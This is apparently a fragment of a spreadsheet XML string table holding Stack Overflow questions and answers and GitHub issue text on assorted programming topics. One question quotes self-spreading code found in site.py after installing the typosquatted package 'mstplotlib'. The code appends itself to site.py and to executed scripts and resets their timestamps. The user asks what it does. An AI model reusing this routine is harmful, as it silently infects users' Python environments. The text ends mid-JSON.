    <t>C8</t>
  </si>
  <si>
    <t># Sources for search performance:
1. [A stackoverflow about angular filter performance](https://stackoverflow.com/questions/26876514/optimize-angular-filter-performance)
    * I selected a search debounce of 50ms that's fast enough to catch fast deletion and typing but responsive enough to not bother the user</t>
  </si>
  <si>
    <t>I would make 3 suggestions to improve performance:
As New Dev said, use ng-if instead of ng-show to remove the whole node from the DOM, which will mean that no processing of directives on the removed nodes will occur at all. I tend to prefer ng-if in 99% of scenarios now, unless I know that the visibility of the option will toggle a lot and therefore modifying the class of an existing node is quicker than inserting and removing the same node over and over again.
Use a track by in your ng-repeat expression. This means that Angular will re-use DOM nodes for items in the array that have the same matching value. e.g. if you have track by p.UserName (so long as UserName is 100% unique), if it encounters a record with the same username, it will use the same DOM node as before, rather than recreating a new one.
Use ng-model-options to have a debounce on the filter input so that if a user is typing fast, not every keystroke will trigger a new filtering operation. You may need to experiment to find the correct timeout value that works for you in your target browsers.
I have created an example Plunkr that shows these techniques in action. When I tried it with 100,000 records in the list of "permissions" (really just dummy users in the example), it was still very fast in Chrome. Didn't test in other browsers, though.</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently architecting a small CRUD applicaton. Their database is a huge mess and will be changing frequently over the course of the next 6 months to a year. What would you recommend for my data layer:
1) ORM (if so, which one?)
2) Linq2Sql
3) Stored Procedures
4) Parametrized Queries
I really need a solution that will be dynamic enough (both fast and easy) where I can replace tables and add/delete columns frequently.
Note: I do not have much experience with ORM (only a little SubSonic) and generally tend to use stored procedures so maybe that would be the way to go. I would love to learn Ling2Sql or NHibernate if either would allow for the situation I've described above.
</t>
  </si>
  <si>
    <t>C80</t>
  </si>
  <si>
    <t>Add command and HTTP API to hash a value according to our algorithm #5957
https://stackoverflow.com/questions/41306350/how-to-generate-password-hash-for-rabbitmq-management-http-api
Since passwords must be hashed when used in a definitions file we should provide a canonical way or ways of doing it.</t>
  </si>
  <si>
    <t>And for the fun the bash version !
#!/bin/bash
function encode_password()
{
    SALT=$(od -A n -t x -N 4 /dev/urandom)
    PASS=$SALT$(echo -n $1 | xxd -ps | tr -d '\n' | tr -d ' ')
    PASS=$(echo -n $PASS | xxd -r -p | sha256sum | head -c 128)
    PASS=$(echo -n $SALT$PASS | xxd -r -p | base64 | tr -d '\n')
    echo $PASS
}
encode_password "some-password"</t>
  </si>
  <si>
    <t xml:space="preserve">I'm familiar with object-oriented architecture, including use of design patterns and class diagrams for visualization, and I know of service-oriented architecture with its contracts and protocol bindings, but is there anything characteristic about a software architecture for a system written in a functional programming language?
I know that FP has been used for medium-size to large scale projects. Paul Graham wrote the first incarnation of Yahoo! Store in Common Lisp. Some lisp development systems are complex. Artifical intelligence and financial systems written in functional languages can get pretty big. They all have at least some kind of inherent architecture, though, I'm wondering if they have anything in common?
What does an architecture based on the evaluation of expressions look like? Are FP architectures more composable?
Update: Kyle reminded me that [external-link] is a good resource for this subject.
Update 2: I found a good post on the subject:  [external-link]
</t>
  </si>
  <si>
    <t>C800</t>
  </si>
  <si>
    <t>Reusable layout #15
I assume that almost every view will have a navigation drawer, so the layout elements will be the same in each one of them. We should rather make one main layout and include inside of it more unique views. This could possibly be done with fragments (which would trigger some changes in our mvp pattern). The structure of the main layout could be like this:
&lt;DrawerLayout&gt;
    &lt;CoordinatorLayout&gt;
        &lt;AppBarLayout&gt;
            &lt;Toolbar/&gt;
        &lt;/AppBarLayout&gt;
        &lt;---included content---&gt;
    &lt;/CoordinatorLayout&gt;
    &lt;NavigationView/&gt;
&lt;/DrawerLayout&gt;
https://stackoverflow.com/questions/35373540/reuse-parent-layout-in-android</t>
  </si>
  <si>
    <t>Two options: ViewStub
Define the main layout with a ViewStub where you will have different sub-layouts.
A ViewStub is an invisible, zero-sized View that can be used to lazily inflate layout resources at runtime. When a ViewStub is made visible, or when inflate() is invoked, the layout resource is inflated. The ViewStub then replaces itself in its parent with the inflated View or Views.
In each Activity you set the same layout and then inflate the specific sub-layout onto the ViewStub.
Fragments
If you want to avoid having massive quantities of code on a single Activity you might want to think about using Fragments.
Some other topics to guide you:
https://stackoverflow.com/questions/11577777/how-to-use-view-stub-in-android
Loading Views On Demand</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to programmatically extract information from an Enterprise Architect model (saved in an [external-link] file) - I need it to generate some reports, but I don't want to go so far as to create an EA add-in. Is there a C# XMI parser library anywhere?
I could of course generate XMI parsing code from its XML schema, but that would be my second option.
</t>
  </si>
  <si>
    <t>C801</t>
  </si>
  <si>
    <t>Setup clean architecture and MVC pattern #6
https://stackoverflow.com/questions/64943693/what-are-the-best-practices-for-structuring-a-fastapi-project</t>
  </si>
  <si>
    <t>Harsha already mentioned my
project generator
but I think it can be helpful for future readers to explain the ideas behind of it.
If you are going to serve your frontend something like
yarn
or
npm
. You should not worry about the structure between them. With something like
axios
or the Javascript's
fetch
you can easily talk with your backend from anywhere.
When it comes to structuring the backend, if you want to render templates with Jinja, you can have something that is close to MVC Pattern.
your_project
├── __init__.py
├── main.py
├── core
│   ├── models
│   │   ├── database.py
│   │   └── __init__.py
│   ├── schemas
│   │   ├── __init__.py
│   │   └── schema.py
│   └── settings.py
├── tests
│   ├── __init__.py
│   └── v1
│       ├── __init__.py
│       └── test_v1.py
└── v1
    ├── api.py
    ├── endpoints
    │   ├── endpoint.py
    │   └── __init__.py
    └── __init__.py
By using
__init__
everywhere, we can access the variables from the all over the app, just like Django.
Let's the folders into parts:
Core
models
database.py
schemas
users.py
something.py
settings.py
views
(Add this if you are going to render templates)
v1_views.py
v2_views.py
tests
v1
v2
Models
It is for your database models, by doing this you can import the same database session or object from v1 and v2.
Schemas
Schemas are your Pydantic models, we call it schemas because it is actually used for creating OpenAPI schemas since FastAPI is based on OpenAPI specification we use schemas everywhere, from Swagger generation to endpoint's expected request body.
settings.py
It is for
Pydantic's Settings Management
which is extremely useful, you can use the same variables without redeclaring it, to see how it could be useful for you check out our documentation for
Settings and Environment Variables
Views
This is optional if you are going to render your frontend with Jinja, you can have something close to MVC pattern
Core
views
v1_views.py
v2_views.py
It would look something like this if you want to add views.
Tests
It is good to have your tests inside your backend folder.
APIs
Create them independently by APIRouter, instead of gathering all your APIs inside one file.
Notes
You can use absolute import for all your importing since we are using
__init__
everywhere, see
Python's packaging
docs.
So assume you are trying to import
v1's endpoint.py
from
v2
, you can simply do
from my_project.v1.endpoints.endpoint import something</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried the follow code but It didn't work correctly and it return &amp;quot;None&amp;quot; in the Atr field. I think this isn't a code problem because it doesn't appear an error message.&lt;/p&gt;
&lt;p&gt;Can someone help me please? Thanks&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from datetime import datetime, timedelta
import pandas as pd
import pandas_ta as ta
import yfinance as yf
data = yf.download(&amp;quot;EURUSD=X&amp;quot;, start='2022-01-01', end=datetime.now())
data['atr'] = (ta.atr(data['High'],data['Low'],data['Close'], 14))
print(data)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output attacched&lt;a href="https://i.sstatic.net/JwUGaq2C.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C802</t>
  </si>
  <si>
    <t>Documentation: MVC Static Resource config XML example issue #22975
Actual:
In the MVC Static Resource Config documentation, an example given has the incorrect syntax for resource-cache:
&lt;mvc:resources mapping="/resources/**" location="/public/"&gt;
    &lt;mvc:resource-chain&gt;
        &lt;mvc:resource-cache/&gt;
        &lt;mvc:resolvers&gt;
            &lt;mvc:version-resolver&gt;
                &lt;mvc:content-version-strategy patterns="/**"/&gt;
            &lt;/mvc:version-resolver&gt;
        &lt;/mvc:resolvers&gt;
    &lt;/mvc:resource-chain&gt;
&lt;/mvc:resources&gt;
Expected
&lt;mvc:resources mapping="/resources/**" location="/public/"&gt;
    &lt;mvc:resource-chain resource-cache="true"&gt;
        &lt;mvc:resolvers&gt;
            &lt;mvc:version-resolver&gt;
                &lt;mvc:content-version-strategy patterns="/**"/&gt;
            &lt;/mvc:version-resolver&gt;
        &lt;/mvc:resolvers&gt;
    &lt;/mvc:resource-chain&gt;
&lt;/mvc:resources&gt;
See also https://stackoverflow.com/questions/38087131/resource-versioning-with-configuration-xml-based-spring</t>
  </si>
  <si>
    <t>Yep, so a college of mine already solved this one. The
Spring documentation
is wrong, the right way to use Resource Versioning with XML-Based Configuration is:
&lt;mvc:resources mapping="/resources/**" location="/public-resources/"&gt;
    &lt;mvc:resource-chain resource-cache="true"&gt;
        &lt;mvc:resolvers&gt;
            &lt;mvc:version-resolver&gt;
                &lt;mvc:content-version-strategy patterns="/**"/&gt;
            &lt;/mvc:version-resolver&gt;
        &lt;/mvc:resolvers&gt;
    &lt;/mvc:resource-chain&gt;
&lt;/mvc:resources&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I was having a conversation last week with a coworker about architecture (real architecture, as in designing buildings).  During our talk it came up that architectural blueprints give an architect, civil engineer, and contractor all the detail they need to build something.  It got both of us thinking about the state of software engineering and that there is no universally adopted approach for describing the design of software.  
We have UML, but I find that it is often hard to convey enough detail without the diagrams being overly complex.  Are there good examples of large software that was designed out using elaborate UML diagrams?
Then again, is having a large set of software blueprints even useful?  After all refactoring and rebuilding software is much cheaper than rebuilding a skyscraper.  Are architectural blueprints the wrong analogy for software design?  Is there a better analogy that you can think of?
</t>
  </si>
  <si>
    <t>C803</t>
  </si>
  <si>
    <t>Checklist. I made sure that there are no existing issues - open or closed - to which I could contribute my information.
 I made sure that there are no existing discussions - open or closed - to which I could contribute my information.
 I have read the FAQs inside the app (Menu -&gt; About -&gt; FAQs) and my problem isn't listed.
 I have taken the time to fill in all the required details. I understand that the bug report will be dismissed otherwise.
 This issue contains only one feature request.
 I have read and understood the contribution guidelines.
 I optionally donated to support the Fossify mission.
Feature description
Support https://support.google.com/messages/answer/9487020?hl=en#zippy=%2Cwhat-are-rcs-chats.
Support RCS
Why do you want this feature?
So that I can use the myriad features it affords and communicate with those I would otherwise be unable to via SMS and MMS.
Additional information
https://stackoverflow.com/questions/77366833/how-to-send-receive-rcs-rich-communication-services-messages-from-android-ap#comment137311473_77366833</t>
  </si>
  <si>
    <t>Google is promoting and using
RCS
in its
messaging app
.
As a consequence, it would be good (mandatory ?) for third party SMS apps to support RCS.
I have developed an SMS app in which I sometimes 'encounter' RCS messages.
My app cannot receive RCS messages, but sometimes, a previous app did receive some of these (eg: Google Message App), so my app 'find' these 'old RCS messages in Android SMS DB.
My app is able to read these old messages, but
I have no clue on how to respond to these messages
My app is based on
android-smsmms library
and I found some information (2020) about this RCS issue:
To summarize:
Third party apps cannot support RCS at this time.
Until Google provides APIs or builds RCS support into Android, third party apps will not be able to use it.
You can simply disable RCS (or "Advanced Messaging")
src:
https://web.archive.org/web/20201111221326/https://github.com/maplemedia/pulse-sms-issues/issues/143
Searching for an RCS library, I found nothing but an old unmaintained library
rcsjta
Questions:
Is RCS open to third party app as of now? Or will soon be? (It was not in 2021: see
https://www.xda-developers.com/google-messages-rcs-api-third-party-apps/
)
Where can I find accurate information about RCS API current status and roadmap?
Notes:
Here are some SO questions I've already looked at regarding this:
How to read RCS messages from android device programmatically
How does SMS work (with Android devices)?
Android: How to incorporate Rich communication Services in Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I entered the typo &lt;code&gt;pip install mstplotlib&lt;/code&gt; accidentally, the &lt;code&gt;mstplotlib&lt;/code&gt; automatically installs its requirement &lt;code&gt;matplotlib&lt;/code&gt; and other dependencies, and the installation seems successful.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:\Users\admin&amp;gt;pip install mstplotlib
Collecting mstplotlib
  Downloading mstplotlib-3.10.2.tar.gz (845 bytes)
  Preparing metadata (setup.py) ... done
Collecting matplotlib
  Downloading matplotlib-3.10.0-cp311-cp311-win_amd64.whl (8.0 MB)
     ---------------------------------------- 8.0/8.0 MB 1.9 MB/s eta 0:00:00
Collecting contourpy&amp;gt;=1.0.1
  Downloading contourpy-1.3.1-cp311-cp311-win_amd64.whl (219 kB)
     ---------------------------------------- 219.8/219.8 kB 6.8 MB/s eta 0:00:00
Collecting cycler&amp;gt;=0.10
  Downloading cycler-0.12.1-py3-none-any.whl (8.3 kB)
Collecting fonttools&amp;gt;=4.22.0
  Downloading fonttools-4.56.0-cp311-cp311-win_amd64.whl (2.2 MB)
     ---------------------------------------- 2.2/2.2 MB 2.4 MB/s eta 0:00:00
Collecting kiwisolver&amp;gt;=1.3.1
  Downloading kiwisolver-1.4.8-cp311-cp311-win_amd64.whl (71 kB)
     ---------------------------------------- 72.0/72.0 kB 3.9 MB/s eta 0:00:00
Collecting numpy&amp;gt;=1.23
  Downloading numpy-2.2.3-cp311-cp311-win_amd64.whl (12.9 MB)
     ---------------------------------------- 12.9/12.9 MB 2.2 MB/s eta 0:00:00
Collecting packaging&amp;gt;=20.0
  Downloading packaging-24.2-py3-none-any.whl (65 kB)
     ---------------------------------------- 65.5/65.5 kB ? eta 0:00:00
Collecting pillow&amp;gt;=8
  Downloading pillow-11.1.0-cp311-cp311-win_amd64.whl (2.6 MB)
     ---------------------------------------- 2.6/2.6 MB 1.8 MB/s eta 0:00:00
Collecting pyparsing&amp;gt;=2.3.1
  Downloading pyparsing-3.2.1-py3-none-any.whl (107 kB)
     ---------------------------------------- 107.7/107.7 kB 2.1 MB/s eta 0:00:00
Collecting python-dateutil&amp;gt;=2.7
  Downloading python_dateutil-2.9.0.post0-py2.py3-none-any.whl (229 kB)
     ---------------------------------------- 229.9/229.9 kB 4.7 MB/s eta 0:00:00
Collecting six&amp;gt;=1.5
  Downloading six-1.17.0-py2.py3-none-any.whl (11 kB)
Installing collected packages: six, pyparsing, pillow, packaging, numpy, kiwisolver, fonttools, cycler, python-dateutil, contourpy, matplotlib, mstplotlib
  DEPRECATION: mstplotlib is being installed using the legacy 'setup.py install' method, because it does not have a 'pyproject.toml' and the 'wheel' package is not installed. pip 23.1 will enforce this behaviour change. A possible replacement is to enable the '--use-pep517' option. Discussion can be found at https://github.com/pypa/pip/issues/8559
  Running setup.py install for mstplotlib ... done
Successfully installed contourpy-1.3.1 cycler-0.12.1 fonttools-4.56.0 kiwisolver-1.4.8 matplotlib-3.10.0 mstplotlib-3.10.2 numpy-2.2.3 packaging-24.2 pillow-11.1.0 pyparsing-3.2.1 python-dateutil-2.9.0.post0 six-1.17.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, as I attemped to refer to the source of &lt;code&gt;site.py&lt;/code&gt;, there are some suspicious codes at the end of &lt;code&gt;site.py&lt;/code&gt; source file, but I don't know the goals of that:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;mark=&amp;quot;#####MyPython####&amp;quot;#v1.1.2
code=''
with open(__file__,encoding=&amp;quot;utf-8&amp;quot;) as f:
    for line in f:
        if mark in line.strip():
            code=line+f.read()
def spread(file):
    import os;stat=os.stat(file)
    old_time=stat.st_atime,stat.st_mtime
    with open(file,'r',encoding='utf-8') as f:
        for line in f:
            if mark in line:return
    if os.path.getsize(file)&amp;gt;=2560:
        with open(file,'a',encoding='utf-8') as f:
            f.write('\n'+code)
        os.utime(file,old_time)
try:
    spread(__import__(&amp;quot;site&amp;quot;).__file__)
    spread(__import__(&amp;quot;sys&amp;quot;).argv[0])
except:pass
del spread,code,mark,f,line
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Additionally, I'm not certain whether the code is brought by &lt;code&gt;mstplotlib&lt;/code&gt;, or not.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C804</t>
  </si>
  <si>
    <t>t/: Move $BIN variable to module
In order to be able to easily reuse the `$BIN` variable we created in
the test for the `clear` sub-command, move it to a Perl module that can
be included in other tests.
Add the `t/` directory to the include path when running `prove` to
ensure that `bin.pm` can be found and included.
Thanks to these resources for explaining Perl modules:
https://perlmaven.com/how-to-create-a-perl-module-for-code-reuse
https://stackoverflow.com/questions/23899121/perl-declare-and-export-variables-from-a-module/23900384#23900384
https://stackoverflow.com/questions/17931981/what-is-isa-in-perl/17932340#17932340</t>
  </si>
  <si>
    <t>The problem is that you aren't inheriting any functionality from
Exporter
because you haven't set the
@ISA
package variable.
Your module should look like this, after fixing the package name (packages should use upper and lower case letters only, by convention) and should be in the file
OSSpecific.pm
package OSSpecific;
use strict;
use warnings;
use Exporter;
our @ISA    = qw/ Exporter /;
our @EXPORT = qw/ $os_name /;
our $os_name = "Windows";
1;</t>
  </si>
  <si>
    <t xml:space="preserve">Wikipedia has a good [external-link] about the various design patterns. 
Which ones have you used at most in practice and what are your experiences?
When should one go for a pattern and when not ?
Edit: A cool C# based [external-link] with practical DP examples ( tnx to [external-link]
</t>
  </si>
  <si>
    <t>C805</t>
  </si>
  <si>
    <t>Problem solved. Inheritance works now.
Answer in: https://stackoverflow.com/questions/47458765/cyclic-dependency-and-inheritance-compilation-error-on-c?noredirect=1#comment81872882_47458765</t>
  </si>
  <si>
    <t>Since all the variables you declare do not need to know the space occupied by App, Rel and DRel, you don't even need to
#include
the headers in question, you just have to forward declare the name as you do.
So you have you
.h
with
class A;
class B;
class C {
    std::shared_ptr&lt;A&gt; ptra;
    std::shared_ptr&lt;B&gt; ptrb;
};
And then your
.cpp
with
#include "A"
#include "B"
C::C()  { ... }</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a follow-up to &lt;a href="https://stackoverflow.com/questions/79438273/no-match-for-operatorstdostream-nstype-when-in-the-global-namespace"&gt;no match for operator&amp;lt;&amp;lt;(std::ostream, ns::Type) when in the global namespace&lt;/a&gt;, combined with the &lt;code&gt;namespace numerical_chars&lt;/code&gt; trick from &lt;a href="https://stackoverflow.com/a/21389821/1888983"&gt;https://stackoverflow.com/a/21389821/1888983&lt;/a&gt;. I want two things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;To &lt;code&gt;cout &amp;lt;&amp;lt; thirdPartyType&lt;/code&gt; defined in a namespace I don't own&lt;/li&gt;
&lt;li&gt;To use the &lt;code&gt;numerical_chars::operator&amp;lt;&amp;lt;(ostream, char)&lt;/code&gt; in that namespace&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In &lt;code&gt;inline std::ostream&amp;amp; ns::operator&amp;lt;&amp;lt;(std::ostream&amp;amp; os, const ns::Foo&amp;amp; foo)&lt;/code&gt; below I'm trying to print an &lt;code&gt;(int8_t)-1&lt;/code&gt;. Why does &lt;code&gt;using namespace numerical_chars;&lt;/code&gt; not work? It does work if I don't wrap &lt;code&gt;Foo&lt;/code&gt; in &lt;code&gt;namespace ns&lt;/code&gt;.&lt;/p&gt;
&lt;pre class="lang-cpp prettyprint-override"&gt;&lt;code&gt;#include &amp;lt;ostream&amp;gt;
#include &amp;lt;iostream&amp;gt;
namespace numerical_chars {
inline std::ostream&amp;amp; operator&amp;lt;&amp;lt;(std::ostream&amp;amp; os, signed char c)
{
  return os &amp;lt;&amp;lt; static_cast&amp;lt;int&amp;gt;(c);
}
}  // namespace numerical_chars
namespace ns {
struct Foo { int8_t x = -1; };
inline std::ostream&amp;amp; operator&amp;lt;&amp;lt;(std::ostream&amp;amp; os, const Foo&amp;amp; foo)
{
    using namespace numerical_chars; // does nothing
    //using numerical_chars::operator&amp;lt;&amp;lt;; // one solution
    return os &amp;lt;&amp;lt; foo.x; // pls print &amp;quot;-1&amp;quot;, not (char)-1
}
} // namespace ns
int main()
{
    ns::Foo foo;
    std::cout &amp;lt;&amp;lt; foo;
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://godbolt.org/z/od94MY3hc" rel="nofollow noreferrer"&gt;https://godbolt.org/z/od94MY3hc&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Importing the &lt;code&gt;numerical_chars::operator&amp;lt;&amp;lt;&lt;/code&gt; operator specifically does work, but why not the whole namespace?&lt;/p&gt;
&lt;p&gt;Removing &lt;code&gt;operator&amp;lt;&amp;lt;(std::ostream&amp;amp; os, const Foo&amp;amp; foo)&lt;/code&gt; from &lt;code&gt;namespace ns&lt;/code&gt; also works, but unfortunately I need that because I don't own ns::Foo and have to add the operator there for ADL (see the first link above).&lt;/p&gt;
&lt;p&gt;(Yes, I can also just cast &lt;code&gt;Foo::x&lt;/code&gt; to an &lt;code&gt;int&lt;/code&gt;)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C806</t>
  </si>
  <si>
    <t>solutions for accessing microservices through api-gateway from https://stackoverflow.com/questions/66133925/spring-boot-api-gateway-unable-to-resolve-name</t>
  </si>
  <si>
    <t>This bugged me a lot and seemed to be a problem with the Netty and Spring Boot 2.4.x.
But I managed to fix this problem by using the
reactor.netty.http.client.HttpClient
with
DefaultAddressResolverGroup.INSTANCE
resolver.
So, when you create your WebClient bean, you can do the following
@Bean
    @Primary
    public WebClient webClient() {
        HttpClient httpClient = HttpClient.create().resolver(DefaultAddressResolverGroup.INSTANCE);
        return WebClient.builder()
                .clientConnector(new ReactorClientHttpConnector(httpClient))
                .build();
    }
Explanation from the
Netty documentation
on why this works:
By default, the HttpClient uses Netty’s domain name lookup mechanism that resolves a domain name asynchronously. This is as an alternative of the JVM’s built-in blocking resolver.
Sometimes, you may want to switch to the JVM built-in resolver.</t>
  </si>
  <si>
    <t xml:space="preserve">Are there other '.NET (2.0) Unit Testing Framework for Database Access Code' besides DbUnit.NET?
I've been trying DbUnit.NET and some things are not supported. Also, the project seems to be in alpha since 22nd May 2006...
We are refactoring our architecture to be able to do tests with mocking frameworks, but until that work is done I'd like to have a framework like DbUnit.NET (but better).
</t>
  </si>
  <si>
    <t>C807</t>
  </si>
  <si>
    <t xml:space="preserve">use static method instead of constant to avoid cyclic dependency
refer to https://stackoverflow.com/questions/41016957/java-interface-static-variable-is-not-initialized
</t>
  </si>
  <si>
    <t>You have a circular dependency between the
Foo
interface initialization and
FooEnum
enum initialization. Normally, the
FooEnum
initialization wouldn’t trigger the
Foo
interface initialization, but
Foo
has
default methods
.
See
The Java® Language Specification, §12.4.1. When Initialization Occurs
:
When a class is initialized, its superclasses are initialized (if they have not been previously initialized), as well as any superinterfaces (§8.1.5) that declare any default methods (§9.4.3)
If you want to know why default methods do change the behavior, I don’t know a real rationale
to mandate
this. It seems more like that this was added to the specification after the fact,
because the reference implementation exhibited this behavior
due to implementation details (and changing the specification was easier than changing the JVM).
So whenever you have a circular dependency, the result depends on which type is accessed first. The type which has been accessed first will wait for the completion of the other class initializer, but there will be no recursion.
It might not so obvious that
Foo.A.baz();
has such an effect, but this triggers the initialization of
FooEnum
which contains a
switch
over
BarEnum
statement. Whenever a class contains an
enum
switch
, it’s class initializer will prepare a table for it, thus, access the
enum
type right in its initializer, causing its initialization.
That’s why this triggers the
BarEnum
initialization, which in turn triggers the
Bar
initialization. In contrast, the
Bar.Y.qux();
statement directly accesses
Bar
first, triggering its initialization, which in turn triggers the initialization of
BarEnum
.
So you see, executing
Foo.A.baz();
first before
Bar.Y.qux();
triggers the initialization in a different order than executing
Bar.Y.qux();
first before
Foo.A.baz();
.
If
BarEnum
is accessed first, its class initialization will trigger the
Bar
initialization and defer its own initialization until the completion of the
Bar
initializer. In other words, in this case, the
enum
constant fields have not been written when the
Bar
initializer runs, so it will see
null
values for them and copy these
null
references to the fields of
Bar
.
If
Bar
is accessed first, its class initialization will trigger the
BarEnum
initialization which will write the enum constants, so upon its completion, the
Bar
initializer will see correctly initialized values.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to API integration and I have been trying for two weeks but I'm not sure what I am doing wrong&lt;/p&gt;
&lt;p&gt;I tried to search on google AI but no luck - it is not able to give me the results I desire &lt;strong&gt;Thank you in advance&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// PaymentPopup.js  
import React, { useState } from 'react';  
import { View, TextInput, Button, Modal, Text } from 'react-native';  
import axios from 'axios';  
const PaymentPopup = ({ visible, onClose }) =&amp;gt; {  
const [amount, setAmount] = useState('');  
const [paymentMethod, setPaymentMethod] = useState('card');  
const [cardInfo, setCardInfo] = useState({ number: '', expiry: '', cvv: '' });  
const [mobileNumber, setMobileNumber] = useState('');  
const handleSubmit = async () =&amp;gt; {  
const url = ' https://sandbox.lenco.co/access/v2/'; // Replace with actual endpoint.  
let data;  
if (paymentMethod === 'card') {  
data = {  
amount,  
card: {  
number: cardInfo.number,  
expiry: cardInfo.expiry,  
cvv: cardInfo.cvv,  
},  
};  
} else {  
data = {  
amount,  
mobile: {  
number: mobileNumber,  
},  
};  
}  
try {  
const response = await axios.get(url, data, {  
params: {page: '1'},
accept: 'application/json',
headers: { 'Authorization': `Bearer pub- 
88dd921c0ecd73590459a1dd5a9343c77db0f3c344f222b9` },  
});  
console.log('Payment Response:', response.data);  
// Handle successful payment  
{ catch (error) {  
console.error('Payment Error:', error);  
// Handle error  
}  
};  
return (  
&amp;lt;Modal visible={visible} transparent onRequestClose={onClose}&amp;gt;  
&amp;lt;View style={{ flex: 1, justifyContent: 'center', alignItems: 'center' }}&amp;gt;  
&amp;lt;View style={{ width: 300, padding: 20, backgroundColor: 'white' }}&amp;gt;  
&amp;lt;Text&amp;gt;Amount:&amp;lt;/Text&amp;gt;  
&amp;lt;TextInput  
value={amount}  
keyboardType=&amp;quot;numeric&amp;quot;  
onChangeText={setAmount}  
/&amp;gt;  
&amp;lt;Text&amp;gt;Payment Method:&amp;lt;/Text&amp;gt;  
&amp;lt;Button title=&amp;quot;Card&amp;quot; onPress={() =&amp;gt; setPaymentMethod('card')} /&amp;gt;  
&amp;lt;Button title=&amp;quot;Mobile Money&amp;quot; onPress={() =&amp;gt; setPaymentMethod('mobile')} /&amp;gt;  
{paymentMethod === 'card' &amp;amp;&amp;amp; (  
&amp;lt;&amp;gt;  
&amp;lt;Text&amp;gt;Card Number:&amp;lt;/Text&amp;gt;  
&amp;lt;TextInput value={cardInfo.number} onChangeText={n =&amp;gt; setCardInfo({ ...cardInfo, 
number: n })} /&amp;gt;  
&amp;lt;Text&amp;gt;Expiry Date:&amp;lt;/Text&amp;gt;  
&amp;lt;TextInput value={cardInfo.expiry} onChangeText={e =&amp;gt; setCardInfo({ ...cardInfo, 
expiry: e })} /&amp;gt;  
&amp;lt;Text&amp;gt;CVV:&amp;lt;/Text&amp;gt;  
&amp;lt;TextInput value={cardInfo.cvv} onChangeText={c =&amp;gt; setCardInfo({ ...cardInfo, cvv: c 
})} /&amp;gt;  
&amp;lt;/&amp;gt;  
)}  
{paymentMethod === 'mobile' &amp;amp;&amp;amp; (  
&amp;lt;&amp;gt;  
&amp;lt;Text&amp;gt;Mobile Number:&amp;lt;/Text&amp;gt;  
&amp;lt;TextInput value={mobileNumber} onChangeText={setMobileNumber} /&amp;gt;  
&amp;lt;/&amp;gt;  
)}  
&amp;lt;Button title=&amp;quot;Pay&amp;quot; onPress={handleSubmit} /&amp;gt;  
&amp;lt;Button title=&amp;quot;Close&amp;quot; onPress={onClose} /&amp;gt;  
&amp;lt;/View&amp;gt;  
&amp;lt;/View&amp;gt;  
&amp;lt;/Modal&amp;gt;  
);  
}; 
export default PaymentPopup;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is where I am calling the form:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const [isPopupVisible, setPopupVisible] = useState(false);
&amp;lt;View style={{ flex: 1, justifyContent: 'center', alignItems: 'center' }}&amp;gt;  
&amp;lt;Button title=&amp;quot;Open Payment Popup&amp;quot; onPress={() =&amp;gt; setPopupVisible(true)} /&amp;gt;  
&amp;lt;PaymentPopup visible={isPopupVisible} onClose={() =&amp;gt; setPopupVisible(false)} /&amp;gt;  
&amp;lt;/View&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried calling it from the localhost but it failed so I decided to se the sandbox for test which is in the code and the demo public key and API key&lt;/p&gt;
&lt;p&gt;Here is the JSON file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
&amp;quot;status&amp;quot;: true,
&amp;quot;message&amp;quot;: &amp;quot;&amp;quot;,
&amp;quot;data&amp;quot;: [
  {
    &amp;quot;id&amp;quot;: &amp;quot;d7bd9ccb-0737-4e72-a387-d00454341f21&amp;quot;,
    &amp;quot;initiatedAt&amp;quot;: &amp;quot;2024-03-12T07:06:11.562Z&amp;quot;,
    &amp;quot;completedAt&amp;quot;: &amp;quot;2024-03-12T07:14:10.412Z&amp;quot;,
    &amp;quot;amount&amp;quot;: &amp;quot;10.00&amp;quot;,
    &amp;quot;fee&amp;quot;: &amp;quot;0.25&amp;quot;,
    &amp;quot;bearer&amp;quot;: &amp;quot;4276382&amp;quot;,
    &amp;quot;currency&amp;quot;: &amp;quot;ZMW&amp;quot;,
    &amp;quot;reference&amp;quot;: &amp;quot;ref-1&amp;quot;,
    &amp;quot;lencoReference&amp;quot;: &amp;quot;240720004&amp;quot;,
    &amp;quot;type&amp;quot;: &amp;quot;mobile-money&amp;quot;,
    &amp;quot;status&amp;quot;: &amp;quot;successful&amp;quot;,
    &amp;quot;source&amp;quot;: &amp;quot;d94aec3bd31743f9055192f4b43624430e57af1f16d8d9b532d3ef0e07973a89&amp;quot;,
    &amp;quot;reasonForFailure&amp;quot;: null,
    &amp;quot;settlementStatus&amp;quot;: &amp;quot;settled&amp;quot;,
    &amp;quot;settlement&amp;quot;: {
      &amp;quot;id&amp;quot;: &amp;quot;c04583d7-d026-4dfa-b8b5-e96f17f93bb8&amp;quot;,
      &amp;quot;amountSettled&amp;quot;: &amp;quot;9.75&amp;quot;,
      &amp;quot;currency&amp;quot;: &amp;quot;ZMW&amp;quot;,
